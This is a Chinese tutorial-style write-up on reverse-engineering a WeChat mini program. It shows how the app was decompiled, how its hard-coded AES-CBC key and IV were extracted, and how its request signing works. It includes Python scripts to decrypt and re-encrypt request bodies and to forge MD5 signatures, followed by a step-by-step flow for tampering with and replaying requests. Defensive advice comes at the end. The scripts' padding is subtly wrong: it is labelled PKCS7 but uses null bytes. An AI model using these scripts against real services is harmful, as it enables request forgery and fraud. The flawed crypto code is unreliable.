小程序逆向工程实战：数据解密与签名破解技术详解<\/h1>

1. 前言<\/h2>

本技术文档详细记录了一次针对小程序的逆向工程实战过程，重点解决两个核心问题：<\/p>

加密数据包的解密<\/li>

签名机制的破解<\/li> <\/ol>

通过本案例，读者可以学习到小程序逆向工程的完整流程和关键技术点。<\/p>

2. 工具准备<\/h2>

2.1 反编译工具<\/h3>

使用 wxapkg<\/strong> 工具进行小程序反编译：<\/p>

项目地址：https:\/\/github.com\/wux1an\/wxapkg<\/li>
功能：扫描本地缓存的小程序包并反编译<\/li>
使用方法：

上下键选择目标小程序<\/li>
回车后自动在当前路径保存小程序源码<\/li> <\/ul> <\/li> <\/ul>
2.2 抓包工具<\/h3>

Burp Suite：用于拦截和分析网络请求<\/li> <\/ul>
3. 加密分析<\/h2>
3.1 加密特征识别<\/h3>

请求包和响应包均被加密<\/li>
存在签名验证机制（sign参数）<\/li>
重放请求会提示"重复提交"<\/li> <\/ul>
3.2 加密算法定位<\/h3>
通过反编译后代码分析：<\/p>

加密方法位于 t.Encrypt<\/code><\/li>
加密参数：bizContent<\/code><\/li>
加密算法：AES-CBC模式<\/li>
填充方式：PKCS7<\/li>
Key和IV：Base64编码值（示例：HqNRc2XXXXXXXXXXX0wsiw==）<\/li> <\/ul> 4. 解密实现<\/h2> 4.1 Python解密脚本<\/h3> from<\/span> cryptography.hazmat.primitives.ciphers import<\/span> Cipher, algorithms, modes <\/span><\/span>from<\/span> cryptography.hazmat.backends import<\/span> default_backend <\/span><\/span>import<\/span> base64 <\/span><\/span> <\/span><\/span>key_base64 =<\/span> "HqNRXXXXXXXXXXXXwsiw=="<\/span> # 替换为实际Base64密钥<\/span> <\/span><\/span>iv_base64 =<\/span> "HqNRXXXXXXXXXXXXXwsiw=="<\/span> # 替换为实际Base64初始向量<\/span> <\/span><\/span> <\/span><\/span>def<\/span> decrypt<\/span>(encrypted_text): <\/span><\/span> key =<\/span> base64.<\/span>b64decode(key_base64) <\/span><\/span> iv =<\/span> base64.<\/span>b64decode(iv_base64) <\/span><\/span> cipher =<\/span> Cipher(algorithms.<\/span>AES(key), modes.<\/span>CBC(iv), backend=<\/span>default_backend()) <\/span><\/span> decryptor =<\/span> cipher.<\/span>decryptor() <\/span><\/span> <\/span><\/span> encrypted_data =<\/span> base64.<\/span>b64decode(encrypted_text) <\/span><\/span> decrypted_data =<\/span> decryptor.<\/span>update(encrypted_data) +<\/span> decryptor.<\/span>finalize() <\/span><\/span> <\/span><\/span> return<\/span> decrypted_data.<\/span>rstrip(b<\/span>"<\/span>\0<\/span>"<\/span>).<\/span>decode('utf-8'<\/span>) # 移除PKCS7填充<\/span> <\/span><\/span> <\/span><\/span># 测试用例<\/span> <\/span><\/span>while<\/span> True<\/span>: <\/span><\/span> enc_data =<\/span> input("输入密文："<\/span>) <\/span><\/span> print("明文是："<\/span> +<\/span> decrypt(enc_data)) <\/span><\/span><\/code><\/pre>4.2 加密实现（用于后续签名破解）<\/h3> def<\/span> encrypt<\/span>(text): <\/span><\/span> key =<\/span> base64.<\/span>b64decode(key_base64) <\/span><\/span> iv =<\/span> base64.<\/span>b64decode(iv_base64) <\/span><\/span> cipher =<\/span> Cipher(algorithms.<\/span>AES(key), modes.<\/span>CBC(iv), backend=<\/span>default_backend()) <\/span><\/span> encryptor =<\/span> cipher.<\/span>encryptor() <\/span><\/span> <\/span><\/span> padded_data =<\/span> text.<\/span>encode('utf-8'<\/span>) +<\/span> b<\/span>"<\/span>\0<\/span>"<\/span> *<\/span> (16<\/span> -<\/span> len(text) %<\/span> 16<\/span>) # PKCS7填充<\/span> <\/span><\/span> ciphertext =<\/span> encryptor.<\/span>update(padded_data) +<\/span> encryptor.<\/span>finalize() <\/span><\/span> <\/span><\/span> return<\/span> base64.<\/span>b64encode(ciphertext).<\/span>decode('utf-8'<\/span>) <\/span><\/span><\/code><\/pre>5. 签名机制分析<\/h2> 5.1 签名参数组成<\/h3> 签名由以下参数拼接后计算MD5：<\/p> appid=&bizContent=&nonstr=&timestamp=&key= <\/code><\/pre> 5.2 关键参数说明<\/h3> appid<\/code>: 固定值 4d75a8047XXXXXf481018315bab24851<\/code><\/li> key<\/code>: 固定值 5cdf4b8d27XXXXXX88b5d2a4d7ff985b<\/code><\/li> bizContent<\/code>: AES加密后的请求内容<\/li> nonstr<\/code>: 随机数（可固定为8888888888<\/code>）<\/li> timestamp<\/code>: 时间戳（需动态更新）<\/li> <\/ul> 5.3 签名生成流程<\/h3> 拼接所有参数为字符串<\/li> 计算MD5值<\/li> 转换为大写形式<\/li> <\/ol> 6. 签名破解实现<\/h2> 6.1 Python签名生成脚本<\/h3> import<\/span> hashlib <\/span><\/span> <\/span><\/span>def<\/span> generate_sign<\/span>(): <\/span><\/span> appid =<\/span> '4d75a8047XXXXXX8315bab24851'<\/span> <\/span><\/span> bizContent =<\/span> input("输入bizContent："<\/span>) <\/span><\/span> nonstr =<\/span> '8888888888'<\/span> <\/span><\/span> timestamp =<\/span> input("输入timestamp："<\/span>) <\/span><\/span> key =<\/span> '5cdf4b8d27XXXXXX5d2a4d7ff985b'<\/span> <\/span><\/span> <\/span><\/span> sign_str =<\/span> f<\/span>"appid=<\/span>{<\/span>appid}<\/span>&bizContent=<\/span>{<\/span>bizContent}<\/span>&nonstr=<\/span>{<\/span>nonstr}<\/span>&timestamp=<\/span>{<\/span>timestamp}<\/span>&key=<\/span>{<\/span>key}<\/span>"<\/span> <\/span><\/span> md5_hash =<\/span> hashlib.<\/span>md5(sign_str.<\/span>encode()).<\/span>hexdigest().<\/span>upper() <\/span><\/span> <\/span><\/span> print(f<\/span>"签名字符串: <\/span>{<\/span>sign_str}<\/span>"<\/span>) <\/span><\/span> print(f<\/span>"生成签名: <\/span>{<\/span>md5_hash}<\/span>"<\/span>) <\/span><\/span> <\/span><\/span>while<\/span> True<\/span>: <\/span><\/span> generate_sign() <\/span><\/span><\/code><\/pre>6.2 签名破解要点<\/h3> 获取加密后的bizContent<\/code>（使用前述加密脚本）<\/li> 更新timestamp<\/code>为当前时间戳<\/li> 保持nonstr<\/code>不变或使用相同随机值<\/li> 使用固定appid<\/code>和key<\/code><\/li> <\/ol> 7. 完整攻击流程<\/h2> 抓包分析<\/strong>：使用Burp拦截加密请求<\/li> 反编译小程序<\/strong>：获取加密和签名逻辑<\/li> 解密数据<\/strong>：使用AES解密脚本解密bizContent<\/code><\/li> 修改请求<\/strong>：根据需要修改解密后的数据<\/li> 重新加密<\/strong>：将修改后的数据加密为新的bizContent<\/code><\/li> 生成签名<\/strong>：使用新参数生成有效签名<\/li> 重放请求<\/strong>：使用新加密数据和签名发送请求<\/li> <\/ol> 8. 防御建议<\/h2> 针对此类攻击，开发者应采取以下防护措施：<\/p> 动态密钥<\/strong>：避免使用固定密钥，可采用动态密钥交换机制<\/li> 签名增强<\/strong>：加入设备指纹等唯一标识<\/li> 使用非对称加密算法<\/li> <\/ul> <\/li> 请求时效性<\/strong>：严格校验时间戳有效性<\/li> 代码混淆<\/strong>：加强小程序代码混淆保护<\/li> 敏感信息保护<\/strong>：避免在客户端存储关键密钥<\/li> <\/ol> 9. 总结<\/h2> 本案例完整展示了小程序逆向工程中数据解密和签名破解的全过程，关键技术点包括：<\/p> 小程序反编译技术<\/li> AES-CBC加解密实现<\/li> 签名机制分析与破解<\/li> 完整请求重放技术<\/li> <\/ul> 通过掌握这些技术，安全研究人员可以更有效地评估小程序的安全性，同时也提醒开发者加强客户端安全防护措施。<\/p>